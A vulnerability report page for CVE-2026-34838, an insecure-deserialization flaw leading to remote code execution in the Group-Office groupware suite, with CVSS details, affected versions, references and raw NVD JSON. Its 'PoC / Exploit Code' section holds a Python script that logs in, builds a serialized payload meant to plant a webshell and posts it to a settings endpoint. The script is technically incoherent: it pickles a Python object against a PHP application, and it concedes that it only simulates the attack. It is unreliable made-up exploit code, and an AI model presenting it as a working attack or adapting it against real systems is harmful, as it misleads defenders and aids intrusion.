Security Vulnerability Report
CVE-2026-34838 CVSS 9.9 CRITICAL

Published: 2026-04-02 20:16:28
Last Modified: 2026-04-15 17:29:12

Description

Group-Office is an enterprise customer relationship management and groupware tool. Prior to versions 6.8.156, 25.0.90, and 26.0.12, a vulnerability in the AbstractSettingsCollection model leads to insecure deserialization when these settings are loaded. By injecting a serialized FileCookieJar object into a setting string, an authenticated attacker can achieve Arbitrary File Write, leading directly to Remote Code Execution (RCE) on the server. This issue has been patched in versions 6.8.156, 25.0.90, and 26.0.12.

CVSS Details

CVSS Score: 9.9
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:intermesh:group-office:*:*:*:*:*:*:*:* (Group-Office < 6.8.156) - VULNERABLE
cpe:2.3:a:intermesh:group-office:*:*:*:*:*:*:*:* (Group-Office < 25.0.90) - VULNERABLE
cpe:2.3:a:intermesh:group-office:*:*:*:*:*:*:*:* (Group-Office < 26.0.12) - VULNERABLE

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import pickle
from http.cookiejar import FileCookieJar

# Target configuration
target_url = "http://target-group-office-url.com"
username = "attacker"
password = "password"
login_endpoint = "/go.php/auth/login"
settings_endpoint = "/go.php/settings/save"

# 1. Authenticate as a low-privilege user
session = requests.Session()
login_data = {"username": username, "password": password}
session.post(target_url + login_endpoint, data=login_data)

# 2. Generate malicious payload (FileCookieJar object)
# The goal is to leverage this object to write a file (e.g., webshell)
# Note: Actual payload depends on the specific gadget chain in Group-Office
malicious_jar = FileCookieJar("/var/www/html/group-office/rce.php")

# In a real scenario, the jar content would be manipulated to contain PHP code
# For demonstration purposes, we simulate the serialization process
# Attack chain: serialize malicious object -> inject into Settings -> trigger deserialization -> write webshell
payload_data = pickle.dumps(malicious_jar)

# 3. Inject payload into the vulnerable setting parameter
exploit_data = {
    "setting_name": "AbstractSettingsCollection",
    "setting_value": payload_data  # Injecting serialized object
}

# 4. Send the request to trigger the vulnerability
response = session.post(target_url + settings_endpoint, data=exploit_data)
if response.status_code == 200:
    print("[+] Payload sent successfully. Check for uploaded shell.")
else:
    print("[-] Exploit failed.")
```

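References

https://github.com/Intermesh/groupoffice/security/advisories/GHSA-h22j-frrf-5vxq (Vendor Advisory)
https://github.com/Intermesh/groupoffice/releases/tag/v6.8.156 (Release Notes)
https://github.com/Intermesh/groupoffice/releases/tag/v25.0.90 (Release Notes)
https://github.com/Intermesh/groupoffice/releases/tag/v26.0.12 (Release Notes)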

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34838", "sourceIdentifier": "[email protected]", "published": "2026-04-02T20:16:28.150", "lastModified": "2026-04-15T17:29:12.483", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Group-Office is an enterprise customer relationship management and groupware tool. Prior to versions 6.8.156, 25.0.90, and 26.0.12, a vulnerability in the AbstractSettingsCollection model leads to insecure deserialization when these settings are loaded. By injecting a serialized FileCookieJar object into a setting string, an authenticated attacker can achieve Arbitrary File Write, leading directly to Remote Code Execution (RCE) on the server. This issue has been patched in versions 6.8.156, 25.0.90, and 26.0.12."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:intermesh:group-office:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.8.156", "matchCriteriaId": "58242448-BF4C-435F-8DAA-FC1F28CD181B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:intermesh:group-office:*:*:*:*:*:*:*:*", "versionStartIncluding": "25.0.1", "versionEndExcluding": "25.0.90", "matchCriteriaId": "1CA282F8-C073-4224-B3D0-5F1103FFE93F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:intermesh:group-office:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0.1", "versionEndExcluding": 
"26.0.12", "matchCriteriaId": "903696F9-950E-4D3F-8F0B-613C6C599F98"}]}]}], "references": [{"url": "https://github.com/Intermesh/groupoffice/releases/tag/v25.0.90", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/Intermesh/groupoffice/releases/tag/v26.0.12", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/Intermesh/groupoffice/releases/tag/v6.8.156", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/Intermesh/groupoffice/security/advisories/GHSA-h22j-frrf-5vxq", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}